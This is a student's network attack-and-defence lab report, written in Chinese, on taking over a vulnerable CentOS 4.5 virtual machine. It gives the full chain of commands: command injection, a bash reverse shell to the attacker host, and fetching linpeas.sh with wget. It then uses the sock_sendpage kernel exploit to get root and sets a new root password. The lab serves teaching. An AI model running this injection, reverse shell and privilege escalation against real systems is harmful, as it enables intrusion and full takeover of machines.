Lab3
Network Atk&Def lab3 241840273 杨良灼
查询攻击机 IP.
└─$ sudo ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.4 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::9d17:dec1:4341:a804 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:3c:97:80 txqueuelen 1000 (Ethernet)
RX packets 1 bytes 590 (590.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 23 bytes 3090 (3.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8 bytes 480 (480.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8 bytes 480 (480.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
端口扫描.
└─$ sudo nmap -p22,80,111,443,631,3306 -sV 10.0.2.15
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-20 07:55 EDT
Nmap scan report for 10.0.2.15
Host is up (0.000037s latency).
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp closed http
111/tcp closed rpcbind
443/tcp closed https
631/tcp closed ipp
3306/tcp closed mysql
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.39 seconds
使用 Burp Suite 工具:
点击 Open browser 打开后 URL 输入<靶机IP>/index.php
打开拦截(Intercept off -> Intercept on)
随便输入什么发现其拦截得到了 username(uname) 和 password(psw) 参数
POST /index.php HTTP/1.1
Host: 10.0.2.15
Content-Length: 38
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://10.0.2.15
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.0.2.15/index.php
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
uname=123456&psw=114514&btnLogin=Login
故而 username 应存在 SQL 注入漏洞。
输入 <IP 地址>.
发现可达,怀疑是命令行并尝试拼接命令:<IP地址>; whoami,攻击之.
得到了用户名 apache
接下来进行反弹 Shell,首先随意设置一个无用端口作为监听端口,比如 3433:
主机终端执行 nc -lvvp 3433
└─$ nc -lvvp 3433
listening on [any] 3433 ...
然后提交 10.0.2.15; bash -i >& /dev/tcp/10.0.2.4/3433 0>&1,监听端口处得到信息:
└─$ nc -lvvp 3433
listening on [any] 3433 ...
Warning: forward host lookup failed for bogon: Unknown host
connect to [10.0.2.4] from bogon [10.0.2.15] 32769
bash: no job control in this shell
bash-3.00$
尝试执行 whoami 成功得到 apache:
bash-3.00$ whoami
apache
此时已得到其权限,接下来尝试提权.
下载得到 linpeas.sh 文件,利用 python 启动一个外部服务器,将其从主机传入靶机.
└─$ python -m http.server 1142
Serving HTTP on 0.0.0.0 port 1142 (http://0.0.0.0:1142/) ...
通过浏览器输入 URL http://localhost:1142/ 查询文件路径,并防止好 linpeas.sh 文件,随即下载:
bash-3.00$ pwd
/tmp
bash-3.00$ wget http://10.0.2.4:1142/Public/linpeas.sh
查询文件:
bash-3.00$ ls -l
total 944
-rw-r--r-- 1 apache apache 961834 Oct 14 04:26 linpeas.sh
下载完毕后,发现文件权限不足,将该文件的权限改为可执行,并执行.
bash-3.00$ chmod a+x linpeas.sh
bash-3.00$ ls -l
total 944
-rwxr-xr-x 1 apache apache 961834 Oct 14 04:26 linpeas.sh
bash-3.00$ ./linpeas.sh
等待片刻后,注意到其操作系统是 Linux2.6 CentOS,比较古老.
╔══════════╣ Operative system
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits
Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007
LSB Version: :core-3.0-ia32:core-3.0-noarch:graphics-3.0-ia32:graphics-3.0-noarch
Distributor ID: CentOS
Description: CentOS release 4.5 (Final)
Release: 4.5
Codename: Final
尝试在 https://www.exploit-db.com/ 和 searchexpolit 里搜索其漏洞及工具:
└─$ searchsploit linux 2.6 centos
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local P | linux/local/9545.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Es | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Esc | linux_x86/local/9542.c
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1) | linux/local/25444.c
Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation | linux_x86-64/local/45516.c
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
这里使用 9545.c 这个脚本:
查一下有没有 gcc,答案是有,那么就可以直接下载 c 脚本文件在本地编译运行.
bash-3.00$ gcc
gcc: no input files
将文件下载过来,然后执行获取权限并修改密码.
bash-3.00$ chmod 777 9545.c
bash-3.00$ gcc -o exp 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ./exp
sh: no job control in this shell
sh-3.00# whoami
root
sh-3.00# passwd
New UNIX password: s0aked1020
Retype new UNIX password: s0aked1020
Changing password for user root.
passwd: all authentication tokens updated successfully.
登陆靶机成功.